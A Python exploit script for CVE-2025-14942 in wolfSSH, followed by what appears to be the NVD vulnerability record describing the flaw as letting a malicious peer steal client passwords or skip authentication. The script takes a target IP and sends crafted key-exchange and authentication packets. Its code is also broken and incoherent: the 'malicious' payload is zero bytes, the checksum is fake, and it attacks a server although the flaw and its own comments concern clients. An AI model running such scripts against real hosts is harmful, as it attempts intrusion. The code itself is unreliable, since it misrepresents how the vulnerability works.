CVE-2025-14942

# CVE-2025-14942 PoC - wolfSSH Key Exchange State Machine Manipulation # This PoC demonstrates the state machine manipulation vulnerability in wolfSSH import socket import struct import time def create_ssh_packet(msg_type, payload): """Create SSH packet with length, padding, and CRC""" padding_length = 8 packet_length = 1 + len(payload) + padding_length padding = b'\x00' * padding_length packet = struct.pack('>I', packet_length) packet += bytes([padding_length]) packet += bytes([msg_type]) packet += payload packet += padding # Add fake CRC (simplified) packet += struct.pack('>I', 0) return packet def send_ssh_message(sock, msg_type, payload): """Send crafted SSH message""" packet = create_ssh_packet(msg_type, payload) sock.send(packet) def exploit_wolfssh(target_host, target_port=22): """ Exploit CVE-2025-14942 by manipulating wolfSSH key exchange state machine """ print(f"[*] Targeting {target_host}:{target_port}") print("[*] Initiating wolfSSH state machine manipulation attack...") try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target_host, target_port)) # Step 1: Send SSH version string ssh_version = b"SSH-2.0-wolfSSH_1.4.21\r\n" sock.send(ssh_version) response = sock.recv(256) print(f"[+] Received server version: {response.decode().strip()}") # Step 2: Send malicious KEXINIT with manipulated algorithms # This forces the client into an inconsistent state kexinit_payload = create_malicious_kexinit() send_ssh_message(sock, 20, kexinit_payload) # SSH_MSG_KEXINIT # Step 3: Send out-of-order message to trigger state confusion # This attempts to bypass authentication send_ssh_message(sock, 50, b'') # SSH_MSG_USERAUTH_REQUEST # Step 4: Attempt to capture password in clear # Inject fake USERAUTH_SUCCESS to trick client send_ssh_message(sock, 51, b'') # SSH_MSG_USERAUTH_SUCCESS print("[+] Exploit payload sent") print("[!] If vulnerable, client may have sent password in clear") sock.close() except Exception as e: print(f"[-] Error: {e}") print("[*] Note: This is a simplified demonstration") print("[*] Full exploitation requires protocol-level analysis") def create_malicious_kexinit(): """Create manipulated KEXINIT payload""" # Simplified - real attack requires precise protocol construction return b'\x00' * 200 if __name__ == "__main__": import sys if len(sys.argv) > 1: exploit_wolfssh(sys.argv[1]) else: print("Usage: python cve_2025_14942_poc.py <target_ip>")

{"cve": {"id": "CVE-2025-14942", "sourceIdentifier": "[email protected]", "published": "2026-01-06T18:15:42.257", "lastModified": "2026-01-12T17:53:19.670", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "wolfSSH’s key exchange state machine can be manipulated to leak the client’s password in the clear, trick the client to send a bogus signature, or trick the client into skipping user authentication. This affects client applications with wolfSSH version 1.4.21 and earlier. Users of wolfSSH must update or apply the fix patch and it’s recommended to update credentials used. This fix is also recommended for wolfSSH server applications. While there aren’t any specific attacks on server applications, the same defect is present. Thanks to Aina Toky Rasoamanana of Valeo and Olivier Levillain of Telecom SudParis for the report."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:Red", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "RED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wolfssh:wolfssh:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.4.22", "matchCriteriaId": "217566DD-A8FE-408E-9B8C-A08F5F631995"}]}]}], "references": [{"url": "https://github.com/wolfSSL/wolfssh/pull/855", "source": "[email protected]", "tags": ["Issue Tracking"]}]}}